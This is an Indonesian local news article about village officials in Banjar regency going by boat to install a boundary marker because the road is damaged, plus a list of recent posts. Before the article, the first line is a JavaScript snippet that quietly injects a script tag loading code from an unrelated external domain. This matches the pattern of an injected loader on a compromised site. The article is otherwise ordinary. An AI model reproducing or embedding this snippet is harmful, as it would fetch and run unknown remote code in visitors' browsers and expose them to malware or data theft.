(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Jalan Masih Rusak, Begini Perjuangan Aparat Desa Lokbuntar Pasang Patok Batas Desa


KANALKALIMANTAN.COM, MARTAPURA – Bukan sebuah perkara mudah bagi aparat desa yang berlokasi di kawasan pelosok di Kabupaten Banjar untuk memasang patok batas desa.

Diperlukan tenaga ekstra plus kesabaran menuju ke lokasi yang dituju, memasang patok batas dan kembali lagi ke pusat desa.

Seperti halnya yang dilakukan aparat Desa Lokbuntar, Kecamatan Sungai Tabuk, Kabupaten Banjar saat memasang patok pembatas Desa Lok Buntar dengan Desa tetangga, yaitu Desa Sungai Bangkal. Sabtu (11/11/2023).

Baca juga: Warga Khawatirkan Ancaman Pohon Penghijauan di Martapura yang Makin Besar dan Berumur

Kegiatan itu mengharuskan aparat desa menggunakan klotok kecil dengan jarak tempuh lebih dari 30 menit menyusur sungai hingga ke titik lokasi.

Pembakal Lokbuntar, Mursyidi bersama Bhabinkamtibmas, Babinsa, Kepala Desa Sungai Bangkal Beserta Aparatnya, Pendamping Desa, dan Pihak Kecamatan melaksanakan pemasangan pembatas desa Lokbuntar dengan Desa tetangga yaitu Desa Sungai Bangkal sambil susur sungai.

Untuk menuju titik lokasi yang telah ditentukan mereka harus menggunakan klotok kecil dengan menempuh jarak 30 menit dikarenakan kendala jalan darat yang tidak bisa dilewati karena rusak.

Baca juga: Kunjungi Puskesmas Jabiren, Dinkes Pulpis Sambut Tim Assesment Frambusi Kemenkes

“Jarak tempuh kurang lebih 30 menit naik klotok ke titik lokasi. Kami lanjutkan jalan kaki untuk menetapkan batas yang disepakati,” ucap Jumadi Babinsa Desa Lokbuntar.

Saat ini, lanjut dia, cuaca masih kemarau untuk akses jalan darat bisa dilewati dengan berjalan kaki, namun apabila musim hujan tiba maka akses jalan tidak dapat dilewati dengan jalan kaki tapi harus ditempuh menggunakan klotok kecil.

Menurut dia, pernah diusulkan perbaikan jalan tahun 2008/2009 yang lalu namun sampai sekarang tidak ada kelanjutannya bagaimana.

Baca juga: TOP 5 MasterChef Indonesia Season 11, Persaingan Semakin Panas!

Kegiatan pemasangan pembatas antar dua desa tetangga telah dilaksanakan secafa lancar dan sebagaimana mestinya sesuai dengan yang disepakati.

“Alhamdulilah pada hari ini Desa Lokbuntar dan Desa Sungai Bangkal mengadakan kegiatan pemasangan patok batas desa yang dihadiri pemerintahan ke dua desa dan BPD pendamping, Bhabinkamtibmas, Babinsa, pihak kecamatan serta warga,” ucap Mursyidi, Pembakal Lokbuntar. (kanalkalimantan.com/nh)

Reporter : nh
Editor: Dhani


Muhammad Andi

Recent Posts

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

1 jam ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

2 jam ago

Muatan 10 Ton Lebih Terjaring Razia Angkutan ODOL di Trikora

KANALKALIMANTAN.COM, BANJARBARU - Puluhan kendaraan pengangkut barang Over Dimension Over Load (ODOL) terjaring razia oleh… Read More

3 jam ago

Tera Ulang di Pasar Martapura Disambut Antusias Pedagang

KANALKALIMANTAN.COM, MARTAPURA - Tera Ulang Pasar UTTP Tradisional kembali digelar oleh Dinas Koperasi Usaha Mikro… Read More

4 jam ago

Galakkan Keberadaan Perpustakaan, Dispersip Banjar Gelar Sosialisasi

KANALKALIMANTAN.COM, MARTAPURA - Melalui Dinas Perpustakaan dan Kearsipan (Dispersip) Pemerintah Kabupaten Banjar menggelar Sosialisasi Perpustakaan… Read More

4 jam ago

Ajukan Usulan Proklim Lestari, Kelurahan Sekumpul Didatangi Tim dari KLHK

KANALKALIMANTAN.COM, MARTAPURA - Kantor Kelurahan Sekumpul, Kecamatan Martapura, Kabupaten Banjar, Rabu (29/5/2024) pagi kedatangan tim… Read More

4 jam ago

This website uses cookies.